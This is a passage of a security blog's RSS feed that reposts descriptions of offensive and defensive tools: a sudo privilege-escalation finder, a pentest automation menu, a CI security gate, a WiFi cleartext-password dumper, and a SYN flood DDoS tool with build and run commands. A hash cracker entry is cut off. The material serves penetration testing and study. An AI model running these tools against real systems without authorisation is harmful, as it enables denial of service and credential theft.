<p><a title="A tool to identify and exploit sudo rules' misconfigurations and vulnerabilities within sudo (24)" href="https://draft.blogger.com/null" target="_blank" rel="noopener noreferrer" name="user-content-features"></a> <br /><b>Features</b><br /><a title="A tool to identify and exploit sudo rules' misconfigurations and vulnerabilities within sudo (26)" href="https://draft.blogger.com/null" target="_blank" rel="noopener noreferrer" name="user-content-some-of-the-checks-functionalities-that-are-performed-by-the-tool"></a> <br /><b>Some of the checks/functionalities that are performed by the tool:</b></p>
<ul>
<li><strong>Misconfigurations</strong></li>
<li><strong>Dangerous Binaries</strong></li>
<li><strong>Vulnerable versions of sudo &#8211; CVEs</strong></li>
<li><strong>Dangerous Environment Variables</strong></li>
<li><strong>Credential Harvesting</strong></li>
<li><strong>Writable directories where scripts reside</strong></li>
<li><strong>Binaries that might be replaced</strong></li>
<li><strong>Identify missing scripts</strong></li>
</ul>
<p><a title="A tool to identify and exploit sudo rules' misconfigurations and vulnerabilities within sudo (27)" href="https://draft.blogger.com/null" target="_blank" rel="noopener noreferrer" name="user-content-what-version-2-of-sk-includes"></a> <br /><b>What version 2 of SK includes:</b></p>
<ul>
<li>New checks and/or scenarios:</li>
</ul>
<ol>
<li>CVE-2019-14287 &#8211; runas</li>
<li>No CVE yet &#8211; sudoedit &#8211; absolute path</li>
<li>CVE-2019-18634 &#8211; pwfeedback</li>
<li>User Impersonation</li>
<li>list of users in sudo group</li>
</ol>
<ul>
<li>Performance improved</li>
<li>Bugs corrected (checks, export, report,&#8230;)</li>
<li>Continous improvement of the way output presented</li>
<li>New videos will be added soon</li>
<li>Annonying password input several time removed</li>
<li>New functionality: offline mode &#8211; ability to extract the required info from audited system and run SK on host.</li>
<li>Testing environment : A docker to play with the tool and different scenarios, you can also train on PE.</li>
</ul>
<p><b>Usage</b><br /><a title="A tool to identify and exploit sudo rules' misconfigurations and vulnerabilities within sudo (30)" href="https://draft.blogger.com/null" target="_blank" rel="noopener noreferrer" name="user-content-example-online-mode"></a> <br /><b>Example Online mode</b></p>
<blockquote>
<div>
<pre><code>./sudo_killer.sh -c -e -r report.txt -p /tmp</code></pre>
</div>
</blockquote>
<p><a title="A tool to identify and exploit sudo rules' misconfigurations and vulnerabilities within sudo (31)" href="https://draft.blogger.com/null" target="_blank" rel="noopener noreferrer" name="user-content-example-offline-mode"></a> <b>Example Offline mode</b><br />Run extract.sh on system to be audited/victim machine. Copy the output from /tmp/sk_offline.txt on the system to be audited/victim machine to your host.</p>
<ul>
<li><strong>Note: Three checks are missing in the offline mode, still in dev&#8230; coming soon&#8230;</strong></li>
</ul>
<p>Run SK with the below parameter:</p>
<blockquote>
<div>
<pre><code>./sudo_killer.sh -c -i /path/sk_offline.txt</code></pre>
</div>
</blockquote>
<p><a title="A tool to identify and exploit sudo rules' misconfigurations and vulnerabilities within sudo (32)" href="https://draft.blogger.com/null" target="_blank" rel="noopener noreferrer" name="user-content-optional-arguments"></a> <b>Optional arguments</b></p>
<ul>
<li><strong>-c : include CVE checks with respect to sudo version</strong></li>
<li><strong>-i : import (offline mode) from extract.sh</strong></li>
<li><strong>-e : include export of sudo rules / sudoers file</strong></li>
<li><strong>-r : report name (save the output)</strong></li>
<li><strong>-p : path where to save export and report</strong></li>
<li><strong>-s : supply user password for sudo checks (not recommended ++except for CTF)</strong></li>
<li><strong>-h : help</strong></li>
</ul>
<p><a title="A tool to identify and exploit sudo rules' misconfigurations and vulnerabilities within sudo (33)" href="https://draft.blogger.com/null" target="_blank" rel="noopener noreferrer" name="user-content-cves-check"></a> <br /><b>CVEs check</b><br />To update the CVE database : run the following script ./cve_update.sh</p>
<p><a title="A tool to identify and exploit sudo rules' misconfigurations and vulnerabilities within sudo (34)" href="https://draft.blogger.com/null" target="_blank" rel="noopener noreferrer" name="user-content-providing-password-important"></a> <b>Providing password (<strong>Important</strong>)</b><br />If you need to input a password to run sudo -l then the script will not work if you don&#8217;t provide a password with the argument -s.</p>
<p><a title="A tool to identify and exploit sudo rules' misconfigurations and vulnerabilities within sudo (35)" href="https://draft.blogger.com/null" target="_blank" rel="noopener noreferrer" name="user-content-how-to-run-sk-on-the-targetted-audited-machine"></a> <b>How to run SK on the targetted/audited machine</b><br /><strong>If you are on a machine that has internet connection, just git clone the tool and run it. If you are on a machine that does not have internet, then git clone on your host, compress the tool (tar) then transfert the compressed file via http/smb (apache web server / python simplehttpserver / smb server / nc) then uncompressed the file on the targeted system and enjoy!</strong><br /><strong><br /></strong> <a title="A tool to identify and exploit sudo rules' misconfigurations and vulnerabilities within sudo (36)" href="https://draft.blogger.com/null" target="_blank" rel="noopener noreferrer" name="user-content-notes"></a> <b>Notes</b><br />**NOTE : sudo_killer does not exploit automatically by itself, it was designed like this on purpose but check for misconguration and vulnerabilities and then propose you the following (if you are lucky the route to root is near!) :</p>
<ul>
<li><strong>a list of commands to exploit</strong></li>
<li><strong>a list of exploits</strong></li>
<li><strong>some description on how and why the attack could be performed</strong></li>
</ul>
<div><b>&nbsp;</b></div>
<p><a title="A tool to identify and exploit sudo rules' misconfigurations and vulnerabilities within sudo (39)" href="https://draft.blogger.com/null" target="_blank" rel="noopener noreferrer" name="user-content-why-is-it-possible-to-run-sudo-l-without-a-password"></a> <b>Why is it possible to run &#8220;sudo -l&#8221; without a password?</b><br />By default, if the NOPASSWD tag is applied to any of the entries for a user on a host, he or she will be able to run &#8220;sudo -l&#8221; without a password. This behavior may be overridden via the verifypw and listpw options.<br />However, these rules only affect the current user, so if user impersonation is possible (using su) sudo -l should be launched from this user as well.<br />Sometimes the file /etc/sudoers can be read even if sudo -l is not accessible without password.</p>
<p><a title="A tool to identify and exploit sudo rules' misconfigurations and vulnerabilities within sudo (41)" href="https://draft.blogger.com/null" target="_blank" rel="noopener noreferrer" name="user-content-docker-vulnerable-testing-environment"></a> <b>Docker &#8211; Vulnerable testing environment</b><br />**IMPORTANT: The recommended way to test the tool is to use the docker image created on purpose for the testing. The image contained several vulnerabilities and misconfigurations related to the usage of SUDO.<br />Everything is tested from the Docker container available on Docker Hub !**</p>
<p>A Docker image is available on Docker Hub and automatically re-built at each update: <a title="https://hub.docker.com/r/th3xace/sudo_killer_demo" href="https://hub.docker.com/r/th3xace/sudo_killer_demo" target="_blank" rel="nofollow noopener noreferrer">https://hub.docker.com/r/th3xace/sudo_killer_demo</a> . It is initially based on official debian:jessie Docker image (debian:jessie).</p>
<ol>
<li><strong>Pull SUDO_KILLER_DEMO Docker Image from the docker hub (This version maybe a bit more up-to-date):</strong><br />
<blockquote>
<div>
<pre><code>service docker start
docker pull th3xace/sudo_killer_demo
docker run --rm -it th3xace/sudo_killer_demo</code></pre>
</div>
</blockquote>
</li>
<li><strong>Build locally from Dockerfile :</strong><br />
<blockquote>
<div>
<pre><code>service docker start
git clone https://github.com/TH3xACE/SUDO_KILLER.git
cd SUDO_KILLER
docker build -t th3xace/sudo_killer_demo .
docker run --rm -it th3xace/sudo_killer_demo</code></pre>
</div>
</blockquote>
</li>
</ol>
<p><strong>Note: It is important to note that the docker is just an environment that can be used to play with the tool since it contains several vulns to exploit. The tool is meant to be used on its own.</strong><br /><strong><br /></strong> <a title="A tool to identify and exploit sudo rules' misconfigurations and vulnerabilities within sudo (47)" href="https://draft.blogger.com/null" target="_blank" rel="noopener noreferrer" name="user-content-demos"></a> <b>Demos</b><br />Several videos are provided below with different scenarios of exploitation.</p>
<div><iframe loading="lazy" src="https://www.youtube.com/embed/videoseries?list=PLQPKPAuCA40FMpMKWZLxQydLe7rPL5bml" allowfullscreen="allowfullscreen" data-mce-fragment="1" width="560" height="315" frameborder="0"></iframe></div>
<p><b>Disclaimer</b><br />This script is for Educational purpose ONLY. Do not use it without permission. We are not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, system crash, system compromise, etc.) caused by the use of the script is not our responsibility.</p>
<p><b><a class="kiploit-download" title="Download SUDO_KILLER" href="https://github.com/TH3xACE/SUDO_KILLER" target="_blank" rel="nofollow noopener noreferrer">Download SUDO_KILLER</a></b></p>
<p>The post <a href="http://kostacipo.stream/sudo_killer-a-tool-to-identify-and-exploit-sudo-rules-misconfigurations-and-vulnerabilities-within-sudo/">SUDO_KILLER &#8211; A Tool To Identify And Exploit Sudo Rules&#8217; Misconfigurations And Vulnerabilities Within Sudo</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/sudo_killer-a-tool-to-identify-and-exploit-sudo-rules-misconfigurations-and-vulnerabilities-within-sudo/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>PAKURI &#8211; Penetration Test Achieve Knowledge Unite Rapid Interface</title>
		<link>http://kostacipo.stream/pakuri-penetration-test-achieve-knowledge-unite-rapid-interface/</link>
					<comments>http://kostacipo.stream/pakuri-penetration-test-achieve-knowledge-unite-rapid-interface/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Thu, 26 Dec 2019 10:27:43 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[hacks]]></category>
		<category><![CDATA[pentest]]></category>
		<guid isPermaLink="false">http://www.kostacipo.stream/?p=1573</guid>

					<description><![CDATA[<p>&#160; What&#8217;s PAKURIIn Japanese, imitating is called “Pakuru”. ぱくる (godan conjugation, hiragana and katakana パクる, rōmaji pakuru) eat with a wide open mouth steal when one isn&#8217;t looking, snatch, swipe copy someone&#8217;s idea or design nab, be caught by the police Wiktionary:ぱくる Description Pentesters love to move their hands. However, I do not like troublesome [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/pakuri-penetration-test-achieve-knowledge-unite-rapid-interface/">PAKURI &#8211; Penetration Test Achieve Knowledge Unite Rapid Interface</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>&nbsp;</p>
<p><b>What&#8217;s PAKURI</b><br />In Japanese, imitating is called “Pakuru”.</p>
<blockquote>
<blockquote><p>ぱくる (godan conjugation, hiragana and katakana パクる, rōmaji pakuru)</p>
<ol>
<li>eat with a wide open mouth</li>
<li>steal when one isn&#8217;t looking, snatch, swipe</li>
<li>copy someone&#8217;s idea or design</li>
<li>nab, be caught by the police</li>
</ol>
<p><a title="Wiktionary:ぱくる" href="https://en.wiktionary.org/wiki/%E3%81%B1%E3%81%8F%E3%82%8B" target="_blank" rel="nofollow noopener noreferrer">Wiktionary:ぱくる</a></p></blockquote>
</blockquote>
<p><a name="more"></a><br /><b>Description</b></p>
<p>Pentesters love to move their hands. However, I do not like troublesome work. Simple work is performed semi-automatically with simple operations. PAKURI executes commands frequently used in penetration tests by simply operating the numeric keypad. You can test penetration as if you were playing a fighting game.</p>
<p><b>Abilities of &#8220;PAKURI&#8221;.</b></p>
<ul>
<li>Intelligence gathering.</li>
<li>Vulnerability analysis.</li>
<li>Visualize.</li>
<li>Brute Force Attack.</li>
<li>Exploitation.</li>
</ul>
<p><b>Your benefits.</b></p>
<p>By using our PAKURI, you will benefit from the following.<br />For redteam:<br />(a) This saves you the trouble of entering frequently used commands.<br />(b) Beginner pentester can learn the floe of attacks using PAKURI.<br />For blueteam:<br />(c) Attack packets can be generated with a simple operation.<br /><em><strong><br />NOTE</strong></em><br /><em>If you are interested, please use them in an environment <strong>under your control and at your own risk</strong>. And, if you execute the PAKURI on systems that are not under your control, it may be considered an attack and you may have legally liabillity for your action.</em></p>
<p><b>Features</b></p>
<ul>
<li><strong>Scan</strong>
<ul>
<li><a title="Nmap" href="https://tools.kali.org/information-gathering/nmap" target="_blank" rel="nofollow noopener noreferrer">Nmap</a></li>
<li><a title="AutoRecon" href="https://github.com/Tib3rius/AutoRecon.git" target="_blank" rel="nofollow noopener noreferrer">AutoRecon</a></li>
<li><a title="OpenVAS" href="https://tools.kali.org/vulnerability-analysis/openvas" target="_blank" rel="nofollow noopener noreferrer">OpenVAS</a></li>
</ul>
</li>
<li><strong>Exploit</strong>
<ul>
<li><a title="BruteSpray" href="https://tools.kali.org/password-attacks/brutespray" target="_blank" rel="nofollow noopener noreferrer">BruteSpray</a></li>
<li><a title="Metasploit" href="https://tools.kali.org/exploitation-tools/metasploit-framework" target="_blank" rel="nofollow noopener noreferrer">Metasploit</a></li>
</ul>
</li>
<li><strong>Visualize</strong>
<ul>
<li><a title="Faraday" href="https://github.com/infobyte/faraday.git" target="_blank" rel="nofollow noopener noreferrer">Faraday</a></li>
</ul>
</li>
<li><strong>CUI-GUI switching</strong></li>
</ul>
<p><b>Install</b><br /><code>bash install.sh</code></p>
<p><b>Usage</b><br /><code>root@kali:/usr/share/pakuri# ./pakuri.sh</code></p>
<p><b>Main</b></p>
<div class="separator"><a href="https://1.bp.blogspot.com/-S9EE7cGJyN0/XgJr2b9epvI/AAAAAAAARQU/dt7GVYLR7SoHO8JuSzza2_5_bRBT_ce1wCNcBGAsYHQ/s1600/PAKURI_2.png"><img decoding="async" src="https://1.bp.blogspot.com/-S9EE7cGJyN0/XgJr2b9epvI/AAAAAAAARQU/dt7GVYLR7SoHO8JuSzza2_5_bRBT_ce1wCNcBGAsYHQ/s1600/PAKURI_2.png" data-original-height="396" data-original-width="366" border="0"></a></div>
<p><b>Scanning</b></p>
<div class="separator"><a href="https://1.bp.blogspot.com/-vHtArB4FXeQ/XgJr6O9zbxI/AAAAAAAARQY/1CV94mlL8N4_OCMGcQyyikfIZqIUeEThACNcBGAsYHQ/s1600/PAKURI_3.png"><img decoding="async" src="https://1.bp.blogspot.com/-vHtArB4FXeQ/XgJr6O9zbxI/AAAAAAAARQY/1CV94mlL8N4_OCMGcQyyikfIZqIUeEThACNcBGAsYHQ/s1600/PAKURI_3.png" data-original-height="336" data-original-width="412" border="0"></a></div>
<p><b>Exploit</b></p>
<div class="separator"><a href="https://1.bp.blogspot.com/-VHmSaggDkwc/XgJr9n0y4GI/AAAAAAAARQc/tclyQRy_6H0r_EGsDUwh2ov0An-qyt8XgCNcBGAsYHQ/s1600/PAKURI_4.png"><img decoding="async" src="https://1.bp.blogspot.com/-VHmSaggDkwc/XgJr9n0y4GI/AAAAAAAARQc/tclyQRy_6H0r_EGsDUwh2ov0An-qyt8XgCNcBGAsYHQ/s1600/PAKURI_4.png" data-original-height="264" data-original-width="359" border="0"></a></div>
<p><b>Config</b></p>
<div class="separator"><a href="https://1.bp.blogspot.com/-rSPjBXv1xUU/XgJsBHSdA-I/AAAAAAAARQg/8-gdUBj37ikjz_Dk505mRVFS1CRxwvtRwCNcBGAsYHQ/s1600/PAKURI_5.png"><img decoding="async" src="https://1.bp.blogspot.com/-rSPjBXv1xUU/XgJsBHSdA-I/AAAAAAAARQg/8-gdUBj37ikjz_Dk505mRVFS1CRxwvtRwCNcBGAsYHQ/s1600/PAKURI_5.png" data-original-height="333" data-original-width="368" border="0"></a></div>
<p><b>Command</b></p>
<div class="separator"><a href="https://1.bp.blogspot.com/-N8F9XmPHs2Q/XgJsEt-TWUI/AAAAAAAARQk/tje0j--kJNgzMyUNPcChwVDamdyMYKmtQCNcBGAsYHQ/s1600/PAKURI_6.png"><img decoding="async" src="https://1.bp.blogspot.com/-N8F9XmPHs2Q/XgJsEt-TWUI/AAAAAAAARQk/tje0j--kJNgzMyUNPcChwVDamdyMYKmtQCNcBGAsYHQ/s1600/PAKURI_6.png" data-original-height="351" data-original-width="369" border="0"></a></div>
<p>&nbsp;</p>
<div class="separator"><a href="https://1.bp.blogspot.com/-QxRZyBWAINQ/XgJsEwNkTHI/AAAAAAAARQo/aAnRKqH9TRoZBA0_fzT4v4r-OI8rBexOwCNcBGAsYHQ/s1600/PAKURI_7.png"><img decoding="async" src="https://1.bp.blogspot.com/-QxRZyBWAINQ/XgJsEwNkTHI/AAAAAAAARQo/aAnRKqH9TRoZBA0_fzT4v4r-OI8rBexOwCNcBGAsYHQ/s1600/PAKURI_7.png" data-original-height="351" data-original-width="387" border="0"></a></div>
<p><b>Operation check environment</b></p>
<ul>
<li>OS: KAli Linux 2019.4</li>
<li>Memory: 8.0GB</li>
</ul>
<p><strong>This tool is not yet complete. It will be updated sequentially.</strong></p>
<div><b><a class="kiploit-download" title="Download PAKURI" href="https://github.com/01rabbit/PAKURI" target="_blank" rel="nofollow noopener noreferrer">Download PAKURI</a></b></div>
<p>The post <a href="http://kostacipo.stream/pakuri-penetration-test-achieve-knowledge-unite-rapid-interface/">PAKURI &#8211; Penetration Test Achieve Knowledge Unite Rapid Interface</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/pakuri-penetration-test-achieve-knowledge-unite-rapid-interface/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Anteater – CI/CD Security Gate Check Framework</title>
		<link>http://kostacipo.stream/anteater-ci-cd-security-gate-check-framework/</link>
					<comments>http://kostacipo.stream/anteater-ci-cd-security-gate-check-framework/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Tue, 24 Dec 2019 13:49:26 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[DevOps]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[ci/cd]]></category>
		<category><![CDATA[hacks]]></category>
		<guid isPermaLink="false">http://www.kostacipo.stream/?p=1567</guid>

					<description><![CDATA[<p>&#160; Anteater is a CI/CD Security Gate Check Framework to prevent the unwanted merging of nominated strings, filenames, binaries, deprecated functions, staging environment code/credentials etc. It’s main function is to block content based on regular expressions. &#160; Anything that can be specified with regular expression syntax, can be sniffed out by Anteater. You tell Anteater [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/anteater-ci-cd-security-gate-check-framework/">Anteater – CI/CD Security Gate Check Framework</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>&nbsp;</p>
<p>Anteater is a CI/CD Security Gate Check Framework to prevent the unwanted merging of nominated strings, filenames, binaries, deprecated functions, staging environment code/credentials etc.</p>
<p>It’s main function is to block content based on regular expressions.</p>
<p><img loading="lazy" decoding="async" class="aligncenter size-medium wp-image-5291" src="https://cdn.darknet.org.uk/wp-content/uploads/2019/08/Anteater-CICD-Security-Gate-Check-Framework-640x342.png" sizes="auto, (max-width: 640px) 100vw, 640px" srcset="https://cdn.darknet.org.uk/wp-content/uploads/2019/08/Anteater-CICD-Security-Gate-Check-Framework-640x342.png 640w, https://cdn.darknet.org.uk/wp-content/uploads/2019/08/Anteater-CICD-Security-Gate-Check-Framework.png 800w" alt="Anteater - CI/CD Security Gate Check Framework" width="640" height="342"></p>
<div align="center">&nbsp;</div>
<p>Anything that can be specified with regular expression syntax, can be sniffed out by Anteater. You tell Anteater exactly what you don’t want to get merged, and anteater looks after the rest.</p>
<h2>How Anteater CI/CD Security Gate Check Framework Works</h2>
<p>If Anteater finds something, it exits with a non-zero code which in turn fails the build of your CI tool, with the idea that it would prevent a pull request merging. Any false positives are easily negated by using the same RegExp framework to cancel out the false match.</p>
<p>Entire projects may also be scanned also, using a recursive directory walk. With a few simple steps, it can be easily implemented into a CI/CD workflow with tooling such as Travis CI, CircleCI, Gitlab CI/CD and Jenkins.</p>
<p>Anteater also provides integrates with the Virus Total API, so any binaries, public IP addresses or URL’s found by Anteater, will be sent to the Virus Total API and a report will be returned. If any object is reported as malicious, it will fail the CI build job.</p>
<p>You can also set it to block all binaries or tamper with existing binaries (this includes PDFs, Images etc.) and you can whitelist desired binaries using a SHA256 checksum.</p>
<h3>Using Anteater CI/CD Security Gate Checks</h3>
<p>There is some excellent documentation for Anteater here:</p>
<p><a href="https://anteater.readthedocs.io/en/latest/index.html">Docs » Anteater – CI/CD Gate Check Framework</a></p>
<p>This includes how to get it working with CircleCI which is my personal choice for CI tooling.</p>
<p>In order to use the VirusTotal API, you will first require an API key. These are free to get and can be obtained by signing up to the service <a href="https://www.virustotal.com/#/join-us">here</a>.</p>
<p>Once you have your key, it needs to be set as an environment variable.</p>
<p>You can download Anteater here:</p>
<p><a href="https://github.com/anteater/anteater/archive/master.zip">anteater-master.zip</a></p>
<p>Or read more <a href="https://github.com/anteater/anteater">here</a>.</p>
<p>&nbsp;</p>
<p>The post <a href="http://kostacipo.stream/anteater-ci-cd-security-gate-check-framework/">Anteater – CI/CD Security Gate Check Framework</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/anteater-ci-cd-security-gate-check-framework/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>WiFi-Dumper – Dump WiFi Profiles and Cleartext Passwords</title>
		<link>http://kostacipo.stream/wifi-dumper-dump-wifi-profiles-and-cleartext-passwords/</link>
					<comments>http://kostacipo.stream/wifi-dumper-dump-wifi-profiles-and-cleartext-passwords/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Tue, 24 Dec 2019 13:34:00 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[hacks]]></category>
		<category><![CDATA[wifi]]></category>
		<guid isPermaLink="false">http://www.kostacipo.stream/?p=1561</guid>

					<description><![CDATA[<p>&#160; WiFi-Dumper is an open-source Python-based tool to dump WiFi profiles and cleartext passwords of the connected access points on a Windows machine. This tool will help you in a Wifi penetration testing and could also be useful when performing red team assessments or internal infrastructure engagements. &#160; Each option in the tool generates the [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/wifi-dumper-dump-wifi-profiles-and-cleartext-passwords/">WiFi-Dumper – Dump WiFi Profiles and Cleartext Passwords</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>&nbsp;</p>
<p>WiFi-Dumper is an open-source Python-based tool to dump WiFi profiles and cleartext passwords of the connected access points on a Windows machine. This tool will help you in a Wifi penetration testing and could also be useful when performing red team assessments or internal infrastructure engagements.</p>
<p><img loading="lazy" decoding="async" class="aligncenter size-medium wp-image-5355" src="https://cdn.darknet.org.uk/wp-content/uploads/2019/12/WiFi-Dumper-Dump-WiFi-Profiles-and-Cleartext-Passwords-640x291.png" sizes="auto, (max-width: 640px) 100vw, 640px" srcset="https://cdn.darknet.org.uk/wp-content/uploads/2019/12/WiFi-Dumper-Dump-WiFi-Profiles-and-Cleartext-Passwords-640x291.png 640w, https://cdn.darknet.org.uk/wp-content/uploads/2019/12/WiFi-Dumper-Dump-WiFi-Profiles-and-Cleartext-Passwords.png 738w" alt="WiFi-Dumper - Dump WiFi Profiles and Cleartext Passwords" width="640" height="291"></p>
<div align="center">&nbsp;</div>
<p>Each option in the tool generates the “.txt” file as an output, if you run the tool multiple times, the output gets appended to the previous results.</p>
<h2>Features of WiFi-Dumper – Dump WiFi Profiles and Cleartext Passwords</h2>
<p><strong>Option 1:</strong> Shows the wireless networks available to the system. If the interface name is given, only the networks on the given interface will be listed. Otherwise, all networks visible to the system will be listed.</p>
<p><strong>Option 2:</strong> Shows a list of wireless profiles configured on the system.</p>
<p><strong>Option 3:</strong> Shows the allowed and blocked the wireless network list.</p>
<p><strong>Option 4:</strong> Shows a list of all the wireless LAN interfaces on the system.</p>
<p><strong>Option 5:</strong> Generates a detailed report about each wireless access point profile on the system. Group Policy Profiles are read-only. User Profiles are readable and writeable, and the preference order can be changed.</p>
<p><strong>Option 6:</strong> Dumps the cleartext passwords of every wireless profile on the system. Make sure to generate the profile file (by selecting option 2) before running this option. Always run this as an administrator user to see the cleartext password. User needs to provide the individual wireless name by reading the profile names (option 7).</p>
<p><strong>Option 7:</strong> It opens the list of wireless profiles on the system using notepad.</p>
<p><strong>Option 8:</strong> It saves WLAN profiles to XML files.</p>
<p><strong>Option 9:</strong> Exit gracefully.</p>
<p>You can <strong>download</strong> WiFi-Dumper here:</p>
<p><a href="https://github.com/Viralmaniar/Wifi-Dumper/archive/master.zip">Wifi-Dumper-master.zip</a></p>
<p>Or read more <a href="https://github.com/Viralmaniar/Wifi-Dumper">here</a>.</p>
<p>The post <a href="http://kostacipo.stream/wifi-dumper-dump-wifi-profiles-and-cleartext-passwords/">WiFi-Dumper – Dump WiFi Profiles and Cleartext Passwords</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/wifi-dumper-dump-wifi-profiles-and-cleartext-passwords/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>aSYNcrone &#8211; A SYN Flood DDoS Tool</title>
		<link>http://kostacipo.stream/asyncrone-a-syn-flood-ddos-tool/</link>
					<comments>http://kostacipo.stream/asyncrone-a-syn-flood-ddos-tool/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Fri, 13 Dec 2019 13:34:42 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[DDos]]></category>
		<category><![CDATA[hacks]]></category>
		<guid isPermaLink="false">http://www.kostacipo.stream/?p=1478</guid>

					<description><![CDATA[<p>&#160; aSYNcrone is a C language based, mulltifunction SYN Flood DDoS Weapon. Disable the destination system by sending a SYN&#160;packet&#160;intensively to the destination. aSYNcrone&#8217;s POWER!!! USAGEgit clone https://github.com/fatih4842/aSYNcrone.gitcd aSYNcronegcc aSYNcrone.c -o aSYNcrone -lpthread./aSYNcrone &#60;source port&#62; &#60;target IP&#62; &#60;target port&#62; &#60;thread number&#62; Specifications Internal random IP generator Using threads and faster prepare and sending SYN packets [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/asyncrone-a-syn-flood-ddos-tool/">aSYNcrone &#8211; A SYN Flood DDoS Tool</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>&nbsp;</p>
<div class="separator"><a href="https://1.bp.blogspot.com/-GQTn64Q2zJ4/XecoVvgMImI/AAAAAAAARAg/imS0HOid2rM95WeP5tOCg_2WHmJHx34ugCNcBGAsYHQ/s1600/aSYNcrone_1.gif"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-GQTn64Q2zJ4/XecoVvgMImI/AAAAAAAARAg/imS0HOid2rM95WeP5tOCg_2WHmJHx34ugCNcBGAsYHQ/s640/aSYNcrone_1.gif" data-original-height="309" data-original-width="600" width="640" height="328" border="0"></a></div>
<p>aSYNcrone is a C language based, mulltifunction SYN Flood DDoS Weapon. Disable the destination system by sending a SYN&nbsp;packet&nbsp;intensively to the destination.<br /><a name="more"></a></p>
<p><b>aSYNcrone&#8217;s POWER!!!</b></p>
<div class="separator"><a href="https://1.bp.blogspot.com/-2kbDQME2vQA/XecobJy7obI/AAAAAAAARAk/F3VFiskMoys-Rvd4rE-zGk_9stdA6GvcQCNcBGAsYHQ/s1600/aSYNcrone_2.gif"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-2kbDQME2vQA/XecobJy7obI/AAAAAAAARAk/F3VFiskMoys-Rvd4rE-zGk_9stdA6GvcQCNcBGAsYHQ/s640/aSYNcrone_2.gif" data-original-height="319" data-original-width="600" width="640" height="340" border="0"></a></div>
<p><b>USAGE</b><br /><code>git clone https://github.com/fatih4842/aSYNcrone.git</code><br /><code>cd aSYNcrone</code><br /><code>gcc aSYNcrone.c -o aSYNcrone -lpthread</code><br /><code>./aSYNcrone &lt;source port&gt; &lt;target IP&gt; &lt;target port&gt; &lt;thread number&gt;</code></p>
<p><b>Specifications</b></p>
<ul>
<li>Internal random IP generator</li>
<li>Using threads and faster prepare and sending SYN packets</li>
<li>Different IP Identification number</li>
</ul>
<div><b><a class="kiploit-download" title="Download aSYNcrone" href="https://github.com/fatih4842/aSYNcrone" target="_blank" rel="nofollow noopener noreferrer">Download aSYNcrone</a></b></div>
<p>The post <a href="http://kostacipo.stream/asyncrone-a-syn-flood-ddos-tool/">aSYNcrone &#8211; A SYN Flood DDoS Tool</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/asyncrone-a-syn-flood-ddos-tool/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>HashCobra &#8211; Hash Cracking Tool</title>
		<link>http://kostacipo.stream/hashcobra-hash-cracking-tool/</link>
					<comments>http://kostacipo.stream/hashcobra-hash-cracking-tool/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Fri, 13 Dec 2019 13:25:30 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[cracking]]></category>
		<category><![CDATA[hacks]]></category>
		<category><![CDATA[hash]]></category>
		<guid isPermaLink="false">http://www.kostacipo.stream/?p=1469</guid>

					<description><![CDATA[<p>&#160; This is hashcobra Hash Cracking tool. Usage $ ./hashcobra -H --==[ hashcobra by sepehrdad ]==-- usage: hashcobra -o &#60;opr&#62; [options] &#124; [misc] options: -a &#60;alg&#62; - hashing algorithm [default: md5] - ? to list available algorithms -c &#60;alg&#62; - compression algorithm [default: zstd] - ? to list available algorithms -h &#60;hash&#62; - hash to [&#8230;]</p>
